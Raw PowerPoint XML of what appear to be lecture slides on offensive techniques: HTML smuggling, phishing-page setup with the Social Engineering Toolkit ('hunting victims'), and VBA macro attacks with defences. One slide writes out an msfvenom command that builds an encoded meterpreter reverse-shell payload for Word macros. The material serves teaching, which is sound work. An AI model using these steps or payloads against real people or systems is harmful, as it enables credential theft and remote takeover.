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0"/>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83" r:id="rId23"/>
    <p:sldId id="284" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="280" r:id="rId27"/>
    <p:sldId id="279" r:id="rId28"/>
    <p:sldId id="281" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="287" r:id="rId31"/>
    <p:sldId id="288" r:id="rId32"/>
    <p:sldId id="289" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="294" r:id="rId38"/>
    <p:sldId id="29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daseraphim@outlook.com" initials="i" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="c33e39814e6479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A4CE1-B7F8-4983-80EE-712053C99EE2}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-10-2023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07956-9121-423C-9379-26A9A84F68E4}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="948429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5462E7E-21C6-43BA-9E4B-E0679DB7402E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-10-2023</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CA66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171136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62E7E-21C6-43BA-9E4B-E0679DB7402E}"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66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99837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62E7E-21C6-43BA-9E4B-E0679DB7402E}"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66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28192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62E7E-21C6-43BA-9E4B-E0679DB7402E}"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66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1261436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62E7E-21C6-43BA-9E4B-E0679DB7402E}"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66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1504480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462E7E-21C6-43BA-9E4B-E0679DB7402E}"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A66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413655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462E7E-21C6-43BA-9E4B-E0679DB7402E}"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A66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112455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462E7E-21C6-43BA-9E4B-E0679DB7402E}"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A66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214646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62E7E-21C6-43BA-9E4B-E0679DB7402E}"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A66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4039487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5462E7E-21C6-43BA-9E4B-E0679DB7402E}"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CA66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408464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5462E7E-21C6-43BA-9E4B-E0679DB7402E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-10-2023</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CA66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="391003999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5462E7E-21C6-43BA-9E4B-E0679DB7402E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>04-10-2023</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CA66760-96DF-4F98-98A6-33FEECEC90C3}" type="slidenum">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2152385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target.com/searchsecurity/feature/A-list-of-wireless-network-attacks" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.computerweekly.com/news/252526838/Dropbox-code-compromised-in-phishing-attack" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.techtarget.com/searchsecurity/feature/Why-companies-should-focus-on-preventing-privilege-escalati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8A50-FE34-FB11-4E0D-BAF797848A53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>HTML Smuggling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A977158-64BC-9815-E13E-5ED14454C37A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>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Unit - 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88522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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Social Engineering Toolkit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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="853298"/>
            <a:ext cx="10753725" cy="5050074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>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Social Engineering Attack to gain email access</a:t>
            </a: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Get root access using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo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i</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b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA3925"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>STEP 1. SETUP PHISHING PAGE</a:t>
            </a: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setoolkit</a:t>
            </a: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8549708F-F9F0-D210-036C-CB421B0F0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2453809"/>
            <a:ext cx="4256274" cy="18582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AE8CB8A-0726-8D5C-512B-B6372FB83BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="629209" y="4426997"/>
            <a:ext cx="4346203" cy="2015910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6148" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{337EB8C8-58B3-02B2-AEB9-9F6932FB6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376" y="1216735"/>
            <a:ext cx="5054414" cy="23512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0C672DA-F106-5953-9787-C575FBF31620}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6508376" y="3567954"/>
            <a:ext cx="5045449" cy="2874953"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155469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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Social Engineering Toolkit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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719137" y="853298"/>
            <a:ext cx="10753725" cy="5050074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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check your device IP address, type: ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA3925"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>STEP 2. HUNTING VICTIMS – Type the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="BA3925"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA3925"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Poppins" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> address in the browser</a:t>
            </a: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189C6D3-0CD3-85AD-7C09-058D22B1CF60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="872798" y="1332370"/>
            <a:ext cx="5069541" cy="1672197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8395D76B-561B-EB25-C975-C545BAAD4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036" y="1332370"/>
            <a:ext cx="5457826" cy="168564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B9700B9-A81A-6B38-1482-3F5244726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4" y="3853434"/>
            <a:ext cx="3458697" cy="278941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7C89E3B0-9F46-BFC7-84D0-4554358D1D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5558" y="3720353"/>
            <a:ext cx="6019800" cy="303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65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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBA Macros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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="1238780"/>
            <a:ext cx="10753725" cy="5050074"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>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Visual Basic for Applications (VBA) macros are commonly used in Microsoft Office documents to automate tasks and increase productivity. </a:t>
            </a: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However, VBA macros can also be used offensively by attackers to deliver malware or steal sensitive information from unsuspecting users.</a:t>
            </a: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Attackers can embed malicious code within VBA macros, which can be triggered when the user opens the infected document. </a:t>
            </a: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malicious code can then execute commands on the user's system, download and install malware, or steal sensitive information such as usernames and passwords.</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22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9634-1EEB-7836-44BF-77072AB567F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="638174" y="313763"/>
            <a:ext cx="10772775" cy="645461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VBA Macros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43B49D-1789-C78D-A89A-E0ACE9D739B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="959224"/>
            <a:ext cx="11140329" cy="5329630"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>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detect and prevent VBA macro attacks, organizations can implement several security measures. These include</a:t>
            </a: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1. Enabling macro security settings: By default, Microsoft Office applications disable macros to prevent malicious code execution. Users can enable macros only for trusted documents or from trusted sources.</a:t>
            </a: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2. Deploying anti-virus software: Anti-virus software can detect, and block known VBA macro malware.</a:t>
            </a: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3. User education and awareness: Users should be educated on how to identify and avoid suspicious emails or attachments that may contain VBA macros.</a:t>
            </a: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4. Deploying email security solutions: Email security solutions can detect and block suspicious emails that may contain VBA macros.</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5. Sandboxing VBA macros: Sandboxing can be used to analyze and test VBA macros in a controlled environment to identify potential threats.</a:t>
            </a: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6. Blocking macros from the internet: Organizations can block macros from the internet to prevent users from downloading and opening infected documents.</a:t>
            </a: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685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190F-6985-0345-B0DE-BCF1124CBBFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="580602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>How to load malicious payload using Macros</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8CC9219-B053-E2C0-F08B-BEC163FC3879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676656" y="1264024"/>
            <a:ext cx="10753725" cy="4513841"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To begin, we first need to create our VBScript payload.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -a x86 --platform windows -p windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> LHOST=192.168.1.101 LPORT=8080 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>vba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
